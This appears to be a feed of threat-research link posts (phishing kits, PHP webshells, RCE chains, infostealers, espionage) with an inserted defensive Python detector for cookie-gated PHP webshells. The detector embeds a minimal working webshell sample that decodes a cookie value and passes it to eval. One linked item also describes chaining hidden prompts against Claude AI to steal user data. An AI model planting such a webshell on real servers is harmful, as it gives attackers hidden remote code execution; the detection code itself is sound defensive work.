New.
Sekoia: EvilTokens: an AI-augmented Phishing-as-a-Service for automating BEC fraud – Part 2 https://blog.sekoia.io/eviltokens-an-ai-augmented-phishing-as-a-service-for-automating-bec-fraud-part-2/ @sekoia_io #threatresearch #infosec
Microsoft posted this yesterday, if you missed it:
Microsoft: Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments https://www.microsoft.com/en-us/security/blog/2026/04/02/cookie-controlled-php-webshells-tradecraft-linux-hosting-environments/ #infosec #Linux #Microsoft #threatresearch

Cookie-gated PHP webshells use obfuscation, php-fpm execution, and cron-based persistence to evade detection in Linux hosting environments. This post examines how this tradecraft conceals execution behind specially crafted HTTP cookies.
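One way to hunt for the pattern the Microsoft post describes (a PHP file whose code-execution sink is fed by a crafted cookie), as an added example that is not the Microsoft team's tooling: a small file-local taint check in Python. The two PHP snippets embedded below are constructed for this example, not samples from the report, and the sink list and regexes are this example's own heuristics, so treat a hit as a triage lead rather than a verdict.

```python
import re
from typing import Dict, List

# Constructed sample: a minimal cookie-gated webshell. Nothing executes
# unless a long enough cookie arrives; the payload itself is the cookie.
SAMPLE_WEBSHELL = r'''<?php
if (isset($_COOKIE['sid']) && strlen($_COOKIE['sid']) > 20) {
    $k = $_COOKIE['sid'];
    $p = base64_decode(str_rot13($k));
    @eval($p);
}
echo "ok";
'''

# Constructed benign sample: ordinary cookie handling with no execution sink.
SAMPLE_BENIGN = r'''<?php
if (isset($_COOKIE['lang'])) {
    $lang = preg_replace('/[^a-z]/', '', $_COOKIE['lang']);
    setcookie('lang', $lang, time() + 3600);
}
'''

# Functions that turn a string into executed PHP or a shell command
# (heuristic list chosen for this example).
SINKS = ("eval", "assert", "system", "passthru", "shell_exec", "exec",
         "popen", "proc_open", "create_function")

COOKIE_RE = re.compile(r"\$_COOKIE\b")
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*(.+?);")
SINK_RE = re.compile(r"@?\b(" + "|".join(SINKS) + r")\s*\(")
GATE_RE = re.compile(r"\b(?:if|elseif|while)\s*\(.*\$_COOKIE")


def _mentions(text: str, tainted: set) -> bool:
    """True if text reads $_COOKIE directly or names a tainted variable."""
    if COOKIE_RE.search(text):
        return True
    return any(re.search(re.escape(v) + r"\b", text) for v in tainted)


def analyse_php(src: str) -> Dict[str, List[str]]:
    """Report cookie-gated conditions and sinks fed by cookie-derived data.

    File-local taint only: a variable assigned from an expression that
    mentions $_COOKIE (or an already tainted variable) becomes tainted; a
    sink call whose argument text mentions $_COOKIE or a tainted variable
    is reported with its line number.
    """
    tainted: set = set()
    gates: List[str] = []
    findings: List[str] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if GATE_RE.search(line):
            gates.append(f"line {lineno}: execution gated on a cookie value")
        for var, rhs in ASSIGN_RE.findall(line):
            if _mentions(rhs, tainted):
                tainted.add(var)
        for m in SINK_RE.finditer(line):
            arg = line[m.end():]
            if _mentions(arg, tainted):
                findings.append(
                    f"line {lineno}: {m.group(1)}() fed by cookie-derived data")
    return {"gates": gates, "tainted_vars": sorted(tainted), "findings": findings}


def is_suspicious(report: Dict[str, List[str]]) -> bool:
    """A cookie-gated condition alone is normal; a sink fed by it is not."""
    return bool(report["findings"])


if __name__ == "__main__":
    for name, src in (("webshell", SAMPLE_WEBSHELL), ("benign", SAMPLE_BENIGN)):
        rep = analyse_php(src)
        print(name, "suspicious" if is_suspicious(rep) else "clean", rep)
```

Run it over a hosting account's document root (`for f in *.php: analyse_php(open(f).read())`) and review the files with non-empty `findings`; the benign sample shows why a cookie-gated `if` on its own should not page anyone.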
New.
watchTowr: You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701) https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
Recorded Future: Latin America and the Caribbean Cybercrime Landscape https://www.recordedfuture.com/research/latin-america-and-the-caribbean-cybercrime-landscape
Mandiant: vSphere and BRICKSTORM Malware: A Defender's Guide https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm-defender-guide
Cisco: UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/
Threat Fabric: The Malware Gap: Why Fraud & Security Controls Still Miss Mobile Malware https://www.threatfabric.com/blogs/the-malware-gap-why-fraud-security-controls-still-miss-mobile-malware
Abnormal Security: Meet VENOM: The PhaaS Platform That Neutralizes MFA https://abnormal.ai/blog/venom-phishing-campaign-mfa-credential-theft
From yesterday:
Zscaler: Anthropic Claude Code Leak https://www.zscaler.com/blogs/security-research/anthropic-claude-code-leak #infosec #threatresearch #vulnerability #malware #threatintel #threatintelligence

If you squint and look at the CISA KEV list, you might think it's made up exclusively of vulnerabilities in file transfer solutions. While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA
I thought I saw this yesterday. 🤔
Halcyon: How One Letter Hid a Ransomware Army https://www.halcyon.ai/blog/how-one-letter-hid-a-ransomware-army-qilin
More:
Infosecurity-Magazine: Researchers Observe Sub-One-Hour Ransomware Attacks https://www.infosecurity-magazine.com/news/researchers-subonehour-ransomware/ #infosec #ransomware #threatresearch #cybercrime
Varonis, posted yesterday: A Quiet "Storm": Infostealer Hijacks Sessions, Decrypts Server-Side https://www.varonis.com/blog/storm-infostealer
More:
Infosecurity-Magazine: New 'Storm' Infostealer Remotely Decrypts Stolen Credentials https://www.infosecurity-magazine.com/news/storm-infostealer-remotely/ #infosec #threatresearch
New.
Group-IB: Hooking the Archipelago: Dissecting a Phishing Campaign Targeting Philippine Banking Users https://www.group-ib.com/blog/phisles-phishing-banks-philippines/
Any.Run: Major Cyber Attacks in March 2026: OAuth Phishing, SVG Smuggling, Magecart, and More https://any.run/cybersecurity-blog/major-cyber-attacks-march-2026/ @anyrun_app
Kaspersky: A laughing RAT: CrystalX combines spyware, stealer, and prankware features https://securelist.com/crystalx-rat-with-prankware-features/119283/
Halcyon: How One Letter Hid a Ransomware Army https://www.halcyon.ai/blog/how-one-letter-hid-a-ransomware-army-qilin #threatresearch #ransomware #infosec #phishing #scam #spyware #malware
New.
AhnLab: A malicious LNK that spreads a Python-based backdoor and how it’s spreading (Kimsuky group) https://asec.ahnlab.com/en/93151/ #infosec #threatresearch #Python #malware
New.
Proofpoint: I’d come running back to EU again: TA416 resumes European government espionage campaigns https://www.proofpoint.com/us/blog/threat-insight/id-come-running-back-eu-again-ta416-resumes-european-government-espionage
More:
Infosecurity-Magazine: Chinese Threat Actors Target European Governments in Espionage Campaigns https://www.infosecurity-magazine.com/news/china-hackers-ta416-europe/ #infosec #threatresearch #espionage
BlueVoyant, from yesterday: Unpacking Augmented Marauder’s Multi-Pronged Casbaneiro Campaigns https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns
More:
The Hacker News: Casbaneiro Phishing Targets Latin America and Europe Using Dynamic PDF Lures https://thehackernews.com/2026/04/casbaneiro-phishing-targets-latin.html @thehackernews #infosec #malware #threatresearch
New research shows 3 flaws dubbed #ClaudyDay in Claude AI could be chained to steal user data using fake Google Ads, hidden prompts, and built-in features.
Read: https://hackread.com/claudy-day-flaws-data-theft-fake-claude-ai-ads/
#CyberSecurity #AI #ClaudeAI #InfoSec #DataSecurity #ThreatResearch #Malware #Privacy